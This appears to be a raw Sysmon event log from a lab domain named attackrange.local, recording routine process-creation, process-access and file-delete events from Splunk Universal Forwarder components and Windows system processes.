08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.341{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.208{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EB299F298E18754A759E27FD389680,SHA256=50B8CD5E02FE91688E366016E46C233485067D5EDFECF5E836F91C1EB74B1545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:51.208{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D95779BEDF73FB21CEEC72DCB39FA773,SHA256=999EBA53109334C2C714FF065EBA50947F5F008F905397BDC9838BC3B0E01AF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.943{466BC892-F7A4-60EB-D47D-00000000CF01}88764728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.709{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.577{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D137223E2A00124206544E2C9087DA,SHA256=61299EF96D6EFB06546F13291253550D7AAE23F932AE22BD4670D0A0275A8E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:52.263{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F61BEC561E77053976ECC088FA06515,SHA256=9DFEFE4496306492C6AAFABA60A77D769F76A63AD8DF6B0C72897B8F41E29EB5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EB299F298E18754A759E27FD389680,SHA256=50B8CD5E02FE91688E366016E46C233485067D5EDFECF5E836F91C1EB74B1545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.043{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.040{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.040{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:52.023{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.024{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.725{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F896ABB6F77161FA38661D44A1499EA6,SHA256=BEC6D2F98ACBE5F89B8E79EE793CF21E0694177B6F20E19C674BCA38B2A0E39B,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001053520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.712{466BC892-F7A5-60EB-D57D-00000000CF01}22528028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.593{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CF45D0705EE92A5A2031AAEFC2AF2AC,SHA256=BD03625D4FC6D3025C9A4996E0A50079C8DC3A05A492DD5CE65AE190B8B88119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:53.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=194D8969F17142E705228B24B2D3724B,SHA256=E861EE5002F720A794087BB5459BD86E0C3F1B35B5928863B948EDDC482A91CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:53.408{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 